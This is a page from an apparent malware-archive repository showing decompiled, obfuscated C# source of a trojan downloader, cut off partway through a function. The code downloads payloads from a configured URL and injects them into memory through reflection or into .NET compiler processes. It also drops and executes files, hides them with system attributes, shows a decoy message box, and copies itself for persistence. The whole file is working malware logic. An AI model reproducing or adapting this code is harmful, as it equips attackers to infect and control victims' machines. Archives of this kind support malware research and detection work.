ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-20 10:26:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
4b9382ddbc
MalwareSourceCode/MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/Vza1nv3mnlezcxvyx/ekrod4bellvfxnmof.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

525 lines
27 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: Vza1nv3mnlezcxvyx.ekrod4bellvfxnmof
// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
using Microsoft.Win32;
using Rjk3ibeceopw5x00uimwa5h2w;
using System;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;
using System.Windows.Forms;
namespace Vza1nv3mnlezcxvyx
{
public class ekrod4bellvfxnmof
{
private static bool Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = true;
private byte[] Tts2baf3wiatv5ghnswu3fu4o;
private bool sdztd0ena42ywf4cfnspntfxhjgjjuo2x;
private string vazu5g3yn2qoupbzrnflcm5ta;
private string jfq5w2hqrukvsivotb2eaetcj;
private string H43ao0q1ckx2y3w0qhozixdn5 = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
private int C2zbxxi4za2fdbthchmjymbz0;
private int Zusxmm13kjq0lro02;
private int Byijlyljtwhknkf5jkcwcjhnmxbyfow1f;
private string Mi5ejdb45agibefgw = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ROX");
private string Vwrshilkfvt1muxtiaxqao2vn = string.Empty;
private string Va4nkquvaa0egawrugbp4frralrih1cl5 = string.Empty;
private int vu05zlvgf2zzuc3uhqtm0qh2kdijzsnxb;
private string act0dsy5xkcjtyk4udzmsxpor = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
private string mehj1nkb5kab31y4pa5zzd3zh = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
private string Z2sx3vgolcrkx42a5b2bhnmdt = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
private string wvlwdt5q3igbdkbluauqgzxazzitgesk2 = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
private string ljjgffrum0vanmiev3ujguzbfjpaluf1a = string.Empty;
private string Ns5tkmgwpxzdzhfzygk50izkv = string.Empty;
private string Dxpmu5z21l0jogt41vcdm0t2p = string.Empty;
private string hdb50yp4mb51cxajtk2qahcip = string.Empty;
private string Qmztipvjjobds0bdpgipbz14g = string.Empty;
private string mqmfhbfuww2freoox = string.Empty;
private string Kkrle03d2ekkcyuc2c2102hjd = string.Empty;
private string hyrbz1kfxjvaxj0vistcunjymen3kporm = string.Empty;
private string Ajiami1b52zvc3vohgymtmh5a = string.Empty;
private string R3u01lftwibuhcd22 = string.Empty;
private string Zjtchyef12cwxg4onylzlprmn = string.Empty;
private bool cxhxnrorc5mp1ujxhtq1kbke4;
private bool Fkgl04y45wljpapzd;
private string U5rbzma1hlby3eyyhjbmc5kyd = string.Empty;
private string Odlyq3qfbpoq3mg0so5fipxwu = string.Empty;
private bool cwygyk0oxmm4oly4f;
private string Obpmsku4cgcztab1lmoobkyt5 = string.Empty;
private string gkgcqdokyjuxym4wq0314usgk = string.Empty;
private string nd5mirnaddlzplmuj2yyvlyhv = string.Empty;
private string Jxy14wwtwogymn1qrjcja2xpw = string.Empty;
private bool Mebghajzp0czroix5exzsbjcb;
private bool rkkwfbuqo0azkksqy;
private bool buvpnbb4jdddrparyku5zhpzb;
private bool cgkruwksz1uyngdvorfai14estiwjwa22;
private object zuc0g2puhfoogprwx4kio2wu1;
private MethodInfo Gdjkuqh0cbgb2rrfkrtpdepl3;
private byte[] h3mz2iy1yrgiwje2h(
byte[] V1vn1s3fuxwiz1zga0ixvfsqwh4o403an,
int nmn3ufkvroquqymwx)
{
GZipStream gzipStream = new GZipStream((Stream) new MemoryStream(V1vn1s3fuxwiz1zga0ixvfsqwh4o403an), CompressionMode.Decompress);
byte[] buffer = new byte[nmn3ufkvroquqymwx];
gzipStream.Read(buffer, 0, buffer.Length);
return buffer;
}
private object Xthp414gtl2l4oueqfpd4vbwz(int nauf3mqkhnk2uh1b0ctkgdwzdgjublhyf)
{
Assembly assembly = Assembly.Load(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.br40vohypenwwv4th(ekrod4bellvfxnmof.S2suq1p5s53jd0tp35scdyryf(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("lld.EPnur"))));
Thread.Sleep(1000);
System.Type type = assembly.GetTypes()[nauf3mqkhnk2uh1b0ctkgdwzdgjublhyf];
this.Gdjkuqh0cbgb2rrfkrtpdepl3 = type.GetMethod(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("nuR"));
return Activator.CreateInstance(type);
}
public static byte[] S2suq1p5s53jd0tp35scdyryf(string qocihecx3yidmrejz)
{
using (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(qocihecx3yidmrejz))
{
byte[] buffer = new byte[1024];
using (MemoryStream memoryStream = new MemoryStream())
{
while (true)
{
int count = manifestResourceStream.Read(buffer, 0, buffer.Length);
if (count > 0)
memoryStream.Write(buffer, 0, count);
else
break;
}
return memoryStream.ToArray();
}
}
}
private byte[] pcbc3w2jxlqgmdfs0dlf3dbkc(byte[] Rmzrohqsvjl2eukqp)
{
if (this.Mi5ejdb45agibefgw == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("rox"))
Rmzrohqsvjl2eukqp = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.br40vohypenwwv4th(Rmzrohqsvjl2eukqp);
return Rmzrohqsvjl2eukqp;
}
private void Dsqyxep1xbkqqwuokcmpwlnunygdkudqf()
{
try
{
byte[] numArray = new WebClient().DownloadData(new Uri(this.Obpmsku4cgcztab1lmoobkyt5));
if (this.gkgcqdokyjuxym4wq0314usgk == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0"))
{
try
{
if (!this.Eapnz3st2tmrdospqmsffns5v(numArray))
{
this.zuc0g2puhfoogprwx4kio2wu1 = this.Xthp414gtl2l4oueqfpd4vbwz(0);
this.Gdjkuqh0cbgb2rrfkrtpdepl3.Invoke(this.zuc0g2puhfoogprwx4kio2wu1, new object[3]
{
(object) numArray,
(object) this.Odlyq3qfbpoq3mg0so5fipxwu,
null
});
}
}
catch
{
string tempFileName = Path.GetTempFileName();
this.c55ygxxz3rp1vsemw5o013b42(numArray, tempFileName, true);
}
}
if (!(this.gkgcqdokyjuxym4wq0314usgk == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1")))
return;
string str = this.nd5mirnaddlzplmuj2yyvlyhv + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + this.Jxy14wwtwogymn1qrjcja2xpw;
this.c55ygxxz3rp1vsemw5o013b42(numArray, str, true);
if (this.Mebghajzp0czroix5exzsbjcb)
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden);
if (this.rkkwfbuqo0azkksqy)
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly);
if (!this.buvpnbb4jdddrparyku5zhpzb)
return;
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System);
}
catch (Exception ex)
{
}
}
private static void kv5qn4lnozkkzgj3vdlka0jwl(byte[] Aucuhbtavanuedaqa)
{
try
{
Thread thread = new Thread(new ParameterizedThreadStart(ekrod4bellvfxnmof.Ezm5v3x5yymbsublp));
thread.SetApartmentState(ApartmentState.STA);
thread.Start((object) Aucuhbtavanuedaqa);
thread.Join();
}
catch
{
ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = false;
}
}
private static void Ezm5v3x5yymbsublp(object cbftjeed2ce2adwwe4mzldgan)
{
try
{
MethodInfo entryPoint = Assembly.Load((byte[]) cbftjeed2ce2adwwe4mzldgan).EntryPoint;
if (entryPoint.GetParameters().Length == 1)
entryPoint.Invoke((object) null, new object[1]
{
(object) new string[0]
});
else
entryPoint.Invoke((object) null, (object[]) null);
}
catch
{
ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = false;
}
}
private bool Eapnz3st2tmrdospqmsffns5v(byte[] cjulchhdqxyzkyudifjjo2o31)
{
ekrod4bellvfxnmof.kv5qn4lnozkkzgj3vdlka0jwl(cjulchhdqxyzkyudifjjo2o31);
bool pfc4nm2xfxznssiyioxrgqtphwj0yo4me = ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me;
ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = true;
return pfc4nm2xfxznssiyioxrgqtphwj0yo4me;
}
private void c55ygxxz3rp1vsemw5o013b42(
byte[] hzigskm110h1nfyzxef4f250l,
string Sykxwcxny5q4qajbe,
bool hfm3jqdunhihvesbsfgqdjg4j)
{
try
{
System.IO.File.WriteAllBytes(Sykxwcxny5q4qajbe, hzigskm110h1nfyzxef4f250l);
if (!hfm3jqdunhihvesbsfgqdjg4j)
return;
new Process()
{
StartInfo = {
FileName = Sykxwcxny5q4qajbe
}
}.Start();
}
catch
{
}
}
private byte[] n321udrptnm3xnkdwdxsh0wft(
string Juxxajgoa55m1rpp3wo1ces5w,
int Doydtmooq4wyxmncj,
string q05wpvgwzb3o3sxhl)
{
try
{
IntPtr hModule = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.Pnqgzzjk5f0hyikci(string.Empty);
IntPtr hResInfo = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.Ffz3mpnfyg4clsrkfrhqubycp(hModule, Doydtmooq4wyxmncj, q05wpvgwzb3o3sxhl);
uint length = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.Ncmhhqqsfk5fqfa4eo2qymkyp(hModule, hResInfo);
IntPtr source = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.yeyqpjvohzgayjchvjm2bzdvn(hModule, hResInfo);
byte[] destination = new byte[(IntPtr) length];
Marshal.Copy(source, destination, 0, (int) length);
return destination;
}
catch (Exception ex)
{
Console.WriteLine(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :ecruoser gnidaer rorrE") + Environment.NewLine + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :edoc rorrE") + ex.Message);
return (byte[]) null;
}
}
private string rxto5yfudomwo4quiatvxlgxu(string Mbiqervyw5m4axeh1jzypdawz)
{
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("htaP noitacilppA"))
Mbiqervyw5m4axeh1jzypdawz = Application.StartupPath + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("pmeT"))
Mbiqervyw5m4axeh1jzypdawz = Path.GetTempPath();
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ataDppA"))
Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("stnemucoD yM"))
Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("potkseD"))
Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("eliforP resU"))
Mbiqervyw5m4axeh1jzypdawz = Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ELIFORPRESU")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("seliF margorP"))
Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
return Mbiqervyw5m4axeh1jzypdawz;
}
private string Lzzeex3tbjpnswaet3q3lgne0(string Xp3a2j1mbsdadmfpxakut5qur)
{
string str = string.Empty;
if (Xp3a2j1mbsdadmfpxakut5qur == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0"))
str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Xp3a2j1mbsdadmfpxakut5qur == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
str = Path.GetTempPath();
if (Xp3a2j1mbsdadmfpxakut5qur == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("2"))
str = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
return str;
}
private void Myk2onyuqzunnxikmdzm0nc2t(string Rmzrohqsvjl2eukqp)
{
string[] separator1 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("k3txyjv4t1shfwvlu0g5eijqg")
};
string[] separator2 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("wyaq1kdfdoichsv0drqddokfz")
};
string[] strArray1 = Rmzrohqsvjl2eukqp.Split(separator1, StringSplitOptions.None);
string empty1 = string.Empty;
string empty2 = string.Empty;
string empty3 = string.Empty;
for (int index = 1; index < strArray1.GetUpperBound(0); ++index)
{
string[] strArray2 = strArray1[index].Split(separator2, StringSplitOptions.None);
byte[] numArray = panz0mon2f5aateyhtphwozah.ydxqx4ckpkuemhnp4n2eb4laj(strArray2[1]);
string str1 = strArray2[2];
bool boolean1 = Convert.ToBoolean(strArray2[3]);
string Mbiqervyw5m4axeh1jzypdawz = strArray2[4];
bool boolean2 = Convert.ToBoolean(strArray2[5]);
bool boolean3 = Convert.ToBoolean(strArray2[6]);
int int32 = Convert.ToInt32(strArray2[7]);
bool boolean4 = Convert.ToBoolean(strArray2[8]);
string str2 = this.rxto5yfudomwo4quiatvxlgxu(Mbiqervyw5m4axeh1jzypdawz);
if (boolean1)
{
if (boolean3)
numArray = this.h3mz2iy1yrgiwje2h(numArray, int32);
if (boolean2)
numArray = this.pcbc3w2jxlqgmdfs0dlf3dbkc(numArray);
if (!boolean4)
{
try
{
this.zuc0g2puhfoogprwx4kio2wu1 = this.Xthp414gtl2l4oueqfpd4vbwz(0);
this.Gdjkuqh0cbgb2rrfkrtpdepl3.Invoke(this.zuc0g2puhfoogprwx4kio2wu1, new object[3]
{
(object) numArray,
(object) this.Odlyq3qfbpoq3mg0so5fipxwu,
null
});
}
catch (Exception ex)
{
Console.WriteLine(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :yromem otni elif dnuob gnitcejni rorrE") + Environment.NewLine + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :edoc rorrE") + ex.Message);
}
}
else if (!this.Eapnz3st2tmrdospqmsffns5v(numArray))
Console.WriteLine(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :noitcelfer gnisu elif dnuob gnitcejni rorrE"));
}
else
{
string Sykxwcxny5q4qajbe = str2 + str1;
if (boolean2)
numArray = this.pcbc3w2jxlqgmdfs0dlf3dbkc(numArray);
this.c55ygxxz3rp1vsemw5o013b42(numArray, Sykxwcxny5q4qajbe, true);
}
}
}
private void i4apa2zau4uyfet5mwpyrsauzpucwiech(string Rmzrohqsvjl2eukqp)
{
string[] separator1 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("e5lrvzg0cetvafc32duupzktp")
};
string[] strArray1 = Rmzrohqsvjl2eukqp.Split(separator1, StringSplitOptions.None);
string[] separator2 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ssz5rvlgcnqpykzaU")
};
string[] strArray2 = Rmzrohqsvjl2eukqp.Split(separator2, StringSplitOptions.None);
string[] separator3 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("egekjywbybggo5kvkbs0ogvif")
};
string[] strArray3 = Rmzrohqsvjl2eukqp.Split(separator3, StringSplitOptions.None);
string[] separator4 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("lvbqcbgqoc0vhbpmd")
};
string[] strArray4 = Rmzrohqsvjl2eukqp.Split(separator4, StringSplitOptions.None);
this.H43ao0q1ckx2y3w0qhozixdn5 = strArray1[1];
this.vazu5g3yn2qoupbzrnflcm5ta = strArray1[2];
this.jfq5w2hqrukvsivotb2eaetcj = strArray1[3];
this.C2zbxxi4za2fdbthchmjymbz0 = Convert.ToInt32(strArray1[4]);
this.Zusxmm13kjq0lro02 = Convert.ToInt32(strArray1[5]);
this.Byijlyljtwhknkf5jkcwcjhnmxbyfow1f = Convert.ToInt32(strArray1[6]);
this.Mi5ejdb45agibefgw = strArray2[1];
this.Vwrshilkfvt1muxtiaxqao2vn = strArray2[2];
this.Va4nkquvaa0egawrugbp4frralrih1cl5 = strArray2[3];
this.vu05zlvgf2zzuc3uhqtm0qh2kdijzsnxb = Convert.ToInt32(strArray3[1]);
this.act0dsy5xkcjtyk4udzmsxpor = strArray3[2];
this.mehj1nkb5kab31y4pa5zzd3zh = strArray3[3];
this.Z2sx3vgolcrkx42a5b2bhnmdt = strArray3[4];
this.wvlwdt5q3igbdkbluauqgzxazzitgesk2 = strArray3[5];
this.ljjgffrum0vanmiev3ujguzbfjpaluf1a = strArray3[6];
this.Ns5tkmgwpxzdzhfzygk50izkv = strArray3[7];
this.Dxpmu5z21l0jogt41vcdm0t2p = strArray3[8];
this.hdb50yp4mb51cxajtk2qahcip = strArray3[9];
this.Qmztipvjjobds0bdpgipbz14g = strArray3[10];
this.mqmfhbfuww2freoox = strArray3[11];
this.Kkrle03d2ekkcyuc2c2102hjd = this.Lzzeex3tbjpnswaet3q3lgne0(strArray3[12]);
this.hyrbz1kfxjvaxj0vistcunjymen3kporm = strArray3[13];
this.Ajiami1b52zvc3vohgymtmh5a = strArray3[14];
this.R3u01lftwibuhcd22 = strArray3[15];
this.cxhxnrorc5mp1ujxhtq1kbke4 = Convert.ToBoolean(strArray3[16]);
this.Fkgl04y45wljpapzd = Convert.ToBoolean(strArray3[17]);
this.U5rbzma1hlby3eyyhjbmc5kyd = this.rxto5yfudomwo4quiatvxlgxu(strArray3[18]) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Path.GetRandomFileName();
this.Zjtchyef12cwxg4onylzlprmn = strArray3[19];
this.Odlyq3qfbpoq3mg0so5fipxwu = strArray3[20];
this.U5rbzma1hlby3eyyhjbmc5kyd = this.U5rbzma1hlby3eyyhjbmc5kyd.Substring(0, this.U5rbzma1hlby3eyyhjbmc5kyd.Length - 4) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.");
Path.GetPathRoot(Environment.GetFolderPath(Environment.SpecialFolder.System));
switch (this.Odlyq3qfbpoq3mg0so5fipxwu)
{
case "0":
try
{
this.Odlyq3qfbpoq3mg0so5fipxwu = IntPtr.Size != 4 ? Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ridniw")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.cbv\\72705.0.2v\\46krowemarF\\TEN.tfosorciM\\") : Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ridniw")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.cbv\\72705.0.2v\\krowemarF\\TEN.tfosorciM\\");
break;
}
catch (Exception ex)
{
break;
}
case "1":
this.Odlyq3qfbpoq3mg0so5fipxwu = Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ridniw")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.csc\\72705.0.2v\\krowemarF\\TEN.tfosorciM\\");
break;
}
this.cwygyk0oxmm4oly4f = Convert.ToBoolean(strArray4[1]);
this.Obpmsku4cgcztab1lmoobkyt5 = strArray4[2];
this.gkgcqdokyjuxym4wq0314usgk = strArray4[3];
this.nd5mirnaddlzplmuj2yyvlyhv = strArray4[4];
this.Jxy14wwtwogymn1qrjcja2xpw = strArray4[5];
this.Mebghajzp0czroix5exzsbjcb = Convert.ToBoolean(strArray4[6]);
this.rkkwfbuqo0azkksqy = Convert.ToBoolean(strArray4[7]);
this.buvpnbb4jdddrparyku5zhpzb = Convert.ToBoolean(strArray4[8]);
this.cgkruwksz1uyngdvorfai14estiwjwa22 = Convert.ToBoolean(strArray4[9]);
this.nd5mirnaddlzplmuj2yyvlyhv = this.rxto5yfudomwo4quiatvxlgxu(this.nd5mirnaddlzplmuj2yyvlyhv);
MessageBoxButtons[] messageBoxButtonsArray = new MessageBoxButtons[6]
{
MessageBoxButtons.OK,
MessageBoxButtons.OKCancel,
MessageBoxButtons.YesNo,
MessageBoxButtons.YesNoCancel,
MessageBoxButtons.RetryCancel,
MessageBoxButtons.AbortRetryIgnore
};
MessageBoxIcon[] messageBoxIconArray = new MessageBoxIcon[5]
{
MessageBoxIcon.Hand,
MessageBoxIcon.Asterisk,
MessageBoxIcon.Question,
MessageBoxIcon.Exclamation,
MessageBoxIcon.None
};
if (!(this.H43ao0q1ckx2y3w0qhozixdn5 == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1")))
return;
Thread.Sleep(this.Byijlyljtwhknkf5jkcwcjhnmxbyfow1f * 1000);
int num = (int) MessageBox.Show(this.vazu5g3yn2qoupbzrnflcm5ta, this.jfq5w2hqrukvsivotb2eaetcj, messageBoxButtonsArray[this.C2zbxxi4za2fdbthchmjymbz0], messageBoxIconArray[this.Zusxmm13kjq0lro02]);
}
public void fkjhdaxsce2gfuv1fe5y42qsk()
{
string executablePath = Application.ExecutablePath;
try
{
this.i4apa2zau4uyfet5mwpyrsauzpucwiech(panz0mon2f5aateyhtphwozah.Dsknrcn3xgwm4kutqcymeqtg4(this.n321udrptnm3xnkdwdxsh0wft(executablePath, 55, wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("2U1TFWIUJIOH2YSDWUUDE1JLPQHUHN0TQ"))));
this.Tts2baf3wiatv5ghnswu3fu4o = this.n321udrptnm3xnkdwdxsh0wft(executablePath, 38, wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("PQDKZJWPOV44MQSBJ"));
if (this.act0dsy5xkcjtyk4udzmsxpor == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
this.Tts2baf3wiatv5ghnswu3fu4o = this.h3mz2iy1yrgiwje2h(this.Tts2baf3wiatv5ghnswu3fu4o, this.vu05zlvgf2zzuc3uhqtm0qh2kdijzsnxb);
this.Tts2baf3wiatv5ghnswu3fu4o = this.pcbc3w2jxlqgmdfs0dlf3dbkc(this.Tts2baf3wiatv5ghnswu3fu4o);
if (!this.cxhxnrorc5mp1ujxhtq1kbke4)
{
this.zuc0g2puhfoogprwx4kio2wu1 = this.Xthp414gtl2l4oueqfpd4vbwz(0);
this.Gdjkuqh0cbgb2rrfkrtpdepl3.Invoke(this.zuc0g2puhfoogprwx4kio2wu1, new object[3]
{
(object) this.Tts2baf3wiatv5ghnswu3fu4o,
(object) this.Odlyq3qfbpoq3mg0so5fipxwu,
(object) wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("")
});
}
else
this.Eapnz3st2tmrdospqmsffns5v(this.Tts2baf3wiatv5ghnswu3fu4o);
if (this.Fkgl04y45wljpapzd)
this.c55ygxxz3rp1vsemw5o013b42(this.Tts2baf3wiatv5ghnswu3fu4o, this.U5rbzma1hlby3eyyhjbmc5kyd, true);
string str;
if (!string.IsNullOrEmpty(this.Zjtchyef12cwxg4onylzlprmn))
{
str = this.Kkrle03d2ekkcyuc2c2102hjd + this.Zjtchyef12cwxg4onylzlprmn + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + this.mqmfhbfuww2freoox;
Directory.CreateDirectory(this.Kkrle03d2ekkcyuc2c2102hjd + this.Zjtchyef12cwxg4onylzlprmn);
}
else
str = this.Kkrle03d2ekkcyuc2c2102hjd + this.mqmfhbfuww2freoox;
if (this.mehj1nkb5kab31y4pa5zzd3zh == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
this.Ruzxivkrma3hdd1il(this.ljjgffrum0vanmiev3ujguzbfjpaluf1a, this.Dxpmu5z21l0jogt41vcdm0t2p, str, 1);
if (this.Z2sx3vgolcrkx42a5b2bhnmdt == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
this.Ruzxivkrma3hdd1il(this.ljjgffrum0vanmiev3ujguzbfjpaluf1a, this.hdb50yp4mb51cxajtk2qahcip, str, 2);
if (this.wvlwdt5q3igbdkbluauqgzxazzitgesk2 == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
this.Ruzxivkrma3hdd1il(this.Ns5tkmgwpxzdzhfzygk50izkv, this.Qmztipvjjobds0bdpgipbz14g, str, 3);
if (this.sdztd0ena42ywf4cfnspntfxhjgjjuo2x)
{
byte[] bytes = System.IO.File.ReadAllBytes(Application.ExecutablePath);
if (!System.IO.File.Exists(str))
System.IO.File.WriteAllBytes(str, bytes);
if (System.IO.File.Exists(str))
{
